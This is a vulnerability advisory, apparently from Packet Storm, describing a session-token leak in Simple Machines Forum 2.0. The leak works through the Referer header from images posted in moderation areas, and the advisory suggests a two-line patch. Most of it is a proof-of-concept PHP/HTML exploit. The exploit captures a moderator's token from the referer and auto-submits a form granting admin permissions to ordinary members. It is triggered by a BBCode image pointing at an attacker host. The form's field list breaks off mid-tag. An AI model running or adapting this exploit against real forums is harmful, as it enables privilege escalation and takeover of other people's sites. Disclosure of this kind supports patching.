Simple Machines Forum (SMF) version 2.0 suffers from a session hijacking vulnerability.
5176e18f929e665f6ab08e97bbe7e6029d8964667ebe251b3cd38b946833301eSimple Machines forum (SMF) 2.0 session hijacking
Found by The X-C3LL and seth
http://0verl0ad.blogspot.com/ || http://xd-blog.com.ar/
2011-08-06
Website: http://www.simplemachines.org/
Greets: yoyahack, eddyw, www.portalhacker.net
SMF stops csrf attacks sending a session token in all the requests wich make changes to the forum.
Usually, it goes in the POST content but when navigating the moderation zone it's present in the url (you need to click the links from inside that zone!). In some places, an attacker can use bbcode to insert a <img> tag, forcing the browser to make a request and leak the token in the referer header.
There are two ways for an attacker to place a image:
-Writing in the moderators chat (?action=moderate), requires being a moderator.
-Making a post and reporting it to the moderator (it will be send to all the section mods and the global mods, who will see it in ?action=moderate;area=reports)
Removing lines 104 and 105 from Subs-Menu.php seems to solve the problem and nothing stops working (!):
/////////////////////////////////////////////////////
if (empty($menuOptions['disable_url_session_check']))
$menu_context['extra_parameters'] .= ';' . $context['session_var'] . '=' . $context['session_id'];
/////////////////////////////////////////////////////
PoC exploit wich gives admin privileges to the regular members:
/////////////////////////////////////////////////////
<?PHP
error_reporting(0);
if($_GET[1]){ //Show the image
file_put_contents('.htoken', $_SERVER['HTTP_REFERER']); //we only save the last token because we are lazy
header('Content-Type: image/jpeg');
readfile('clickme.jpg'); //put a image here
}else{ //Redirect to the admin panel
$file = explode(';', file_get_contents('.htoken'));
$file = explode('=', $file[2]);
$token = '<input type="hidden" name="' . htmlentities($file[0], ENT_QUOTES) . '" value="' . htmlentities($file[1], ENT_QUOTES) . '" />';
?>
<html><head></head><body>
<form action="http://localhost/smf/index.php?action=admin;area=permissions;sa=modify2;group=0;pid=0" method="post">
<input type="hidden" name="group_select_view_basic_info" value="on" /><input type="hidden" name="perm[membergroup][view_stats]" value="on" /><input type="hidden" name="perm[membergroup][view_mlist]" value="on" /><input type="hidden" name="perm[membergroup][who_view]" value="on" /><input type="hidden" name="perm[membergroup][search_posts]" value="on" /><input type="hidden" name="perm[membergroup][calendar_view]" value="on" /><input type="hidden" name="perm[membergroup][profile_view_own]" value="on" /><input type="hidden" name="perm[membergroup][profile_view_any]" value="on" /><input type="hidden" name="group_select_moderate_general" value="on" /><input type="hidden" name="perm[membergroup][karma_edit]" value="on" /><input type="hidden" name="perm[membergroup][calendar_edit_any]" value="off" /><input type="hidden" name="perm[membergroup][access_mod_center]" value="on" /><input type="hidden" name="perm[membergroup][moderate_forum]" value="on" /><input type="hidden" name="perm[membergroup][issue_warning]" value="off" /><input type="hidden" name="perm[membergroup][profile_identity_any]" value="on" /><input type="hidden" name="perm[membergroup][profile_extra_any]" value="on" /><input type="hidden" name="perm[membergroup][profile_title_any]" value="on" /><input type="hidden" name="perm[membergroup][profile_remove_any]" value="on" /><input type="hidden" name="group_select_use_pm_system" value="on" /><input type="hidden" name="perm[membergroup][pm_read]" value="on" /><input type="hidden" name="perm[membergroup][pm_send]" value="on" /><input type="hidden" name="perm[membergroup][calendar_post]" value="off" /><input type="hidden" name="perm[membergroup][calendar_edit_own]" value="off" /><input type="hidden" name="group_select_administrate" value="on" /><input type="hidden" name="perm[membergroup][admin_forum]" value="on" /><input type="hidden" name="perm[membergroup][manage_boards]" value="on" /><input type="hidden" name="perm[membergroup][manage_attachments]" value="on" /><input type="hidden" name="perm[membergroup][manage_smileys]" value="on" /><input type="hidden" name="perm[membergroup][edit_news]" value="on" /><input type="hidden" name="perm[membergroup][manage_membergroups]" value="on" /><input type="hidden" name="perm[membergroup][manage_permissions]" value="on" /><input type="hidden" name="perm[membergroup][manage_bans]" value="on" /><input type="hidden" name="perm[membergroup][send_mail]" value="on" /><input type="hidden" name="group_select_edit_profile" value="on" /><input type="hidden" name="perm[membergroup][profile_identity_own]" value="on" /><input type="hidden" name="perm[membergroup][profile_extra_own]" value="on" /><input type="hidden" name="perm[membergroup][profile_title_own]" value="on" /><input type="hidden" name="group_select_delete_account" value="on" /><input type="hidden" name="perm[membergroup][profile_remove_own]" value="on" /><input type="hidden" name="group_select_use_avatar" value="on" /><input type="hidden" name="perm[membergroup][profile_server_avatar]" value="on" /><input type="hidden" name="perm[membergroup][profile_upload_avatar]" value="on" /><input type="hidden" name="perm[membergroup][profile_remote_avatar]" value="on" /><input type="hidden" name="group_select_moderate" value="on" /><input type="hidden" name="perm[board][moderate_board]" value="on" /><input type="hidden" name="perm[board][approve_posts]" value="off" /><input type="hidden" name="perm[board][merge_any]" value="on" /><input type="hidden" name="perm[board][split_any]" value="on" /><input type="hidden" name="perm[board][send_topic]" value="on" /><input type="hidden" name="perm[board][make_sticky]" value="on" /><input type="hidden" name="perm[board][move_own]" value="on" /><input type="hidden" name="perm[board][move_any]" value="on" /><input type="hidden" name="perm[board][lock_own]" value="on" /><input type="hidden" name="perm[board][lock_any]" value="on" /><input type="hidden" name="perm[board][remove_any]" value="on" /><input type="hidden" name="perm[board][modify_replies]" value="on" /><input type="hidden" name="perm[board][
</form><script>document.forms[0].submit()</script>
</body></html>
<?
}
/////////////////////////////////////////////////////
Use:
[url=http://evilhost/exploit.php][img]http://evilhost/exploit.php?1=1[/img][/url]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed